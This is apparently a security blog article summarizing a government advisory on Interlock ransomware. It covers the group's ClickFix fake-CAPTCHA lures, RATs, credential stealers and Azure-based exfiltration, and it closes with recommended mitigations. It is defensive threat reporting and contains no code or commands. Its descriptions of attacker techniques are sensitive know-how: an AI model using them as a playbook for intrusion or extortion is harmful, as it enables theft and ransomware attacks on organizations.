Interlock Ransomware: Why This Unorthodox Threat Demands Your Full Attention 

t: A digital image of a padlock symbol overlaid with the word "Ransomware" displayed across a glowing world map, symbolizing the global threat and reach of the Interlock ransomware campaign.

The latest joint advisory from the FBI, CISA, HHS, and MS-ISAC paints a sharp and disturbing picture of Interlock, a ransomware strain that’s quietly evolved into one of the more dangerous threats to enterprise networks in recent memory. If you’re in the business of defending public or private infrastructure, this alert involves you. Interlock is exploiting uncommon tactics, evading traditional controls, and targeting virtualized environments with surgical precision. 

ClickFix, Drive-Bys, and Fake Security Tools 

Initial access is where Interlock breaks the mold. Unlike most ransomware groups still leaning on phishing and RDP brute-force, Interlock leverages: 

  • Drive-by downloads from compromised legitimate websites. 
  • Fake updates not just for browsers, but now masquerading as endpoint security products (FortiClient, AnyConnect, Ivanti, etc.). 
  • The cleverly designed “ClickFix” technique, which uses fake CAPTCHAs that coax users into running clipboard-based PowerShell commands manually. This tactic is more than novel… it bypasses many automated defenses. 

If your SOC is still focused primarily on phishing detection or known exploit scanning, you’ll miss this. These aren’t payloads caught by traditional email filters. They’re staged in places your users trust and require human action, not just code execution. 

Remote Access Trojans and RAT-Chaining 

Once inside, Interlock establishes persistence using: 

  • PowerShell-based RATs dropped into Startup folders. 
  • Registry key manipulation masked as a “Chrome Updater.” 
  • Familiar toolkits like Cobalt Strike and SystemBC, but also emerging RATs like NodeSnake, spotted in infections as recently as March 2025. 

This blending of legacy and newer tooling makes attribution harder and post-exploitation detection more inconsistent. Instead of looking at one toolset, you’re chasing a constantly rotating C2 strategy. 

Stealing to Escalate 

Interlock follows the “steal first, encrypt later” model, but its credential theft is particularly aggressive. TTPs include: 

  • Deployment of Lumma Stealer, Berserk Stealer, and custom binaries like cht.exe. 
  • Keylogging via klg.dll with logs obfuscated under legit-looking filenames like conhost.txt. 
  • RDP abuse, AnyDesk, and PuTTY for lateral movement. 
  • Kerberoasting for domain privilege escalation. 

Cloud Storage as a Staging Ground 

Data exfiltration is conducted with Azure Storage Explorer and AzCopy, meaning stolen data gets shipped off to Microsoft Azure blob storage before any encryption begins. This signals a few things: 

  • They’re comfortable abusing cloud-native tooling. 
  • They’re bypassing traditional perimeter-based DLP controls. 
  • They anticipate IR teams watching for FTP or SMB exfil, not cloud service usage. 

And for the cherry on top, WinSCP shows up when needed: Yet another legit tool repurposed for malicious transfer. 

What Makes the Encryption Payload Noteworthy 

The encryptor itself has a few quirks: 

  • Windows payload is named conhost.exe, a clever masquerade. 
  • On Linux systems, the ELF-based encryptor includes a function named removeme to delete itself post-encryption — a defense evasion trick rarely seen in VM-targeted Linux ransomware. 
  • In some Windows variants, a malicious DLL (tmp41.wasd) is executed via rundll32.exe to trigger the self-delete sequence. 

Files are typically appended with .interlock or .1nt3rlock, and ransom notes (!__README__!.txt) are pushed via Group Policy Objects. This is domain-aware, policy-driven deployment across enterprise environments. 

The Ransom Model 

The note includes no upfront price. Victims are instructed to connect to a .onion site via Tor, where the actual demand and wallet info are delivered. Payment is in Bitcoin. And unlike many groups, Interlock follows through on threats: tolen data does get leaked if ransom isn’t paid. 

They’re not trying to shock or spread chaos. This is about calculated financial return, tailored extortion, and confidence that victims won’t call their bluff. 

Mitigations You Need to Implement 

Here’s what federal agencies recommend: 

  1. Prevent initial access by implementing domain name system (DNS) filtering and web access firewalls, and training users to spot social engineering attempts. 
  1. Mitigate known vulnerabilities by ensuring operating systems, software, and firmware are patched and up to date. 
  1. Segment networks to restrict lateral movement from initial infected devices and other devices in the same organization. 
  1. Implement identity, credential, and access management (ICAM) policies across the organization and then require multifactor authentication (MFA) for all services to the extent possible. 

RELATED ARTICLESMORE FROM AUTHOR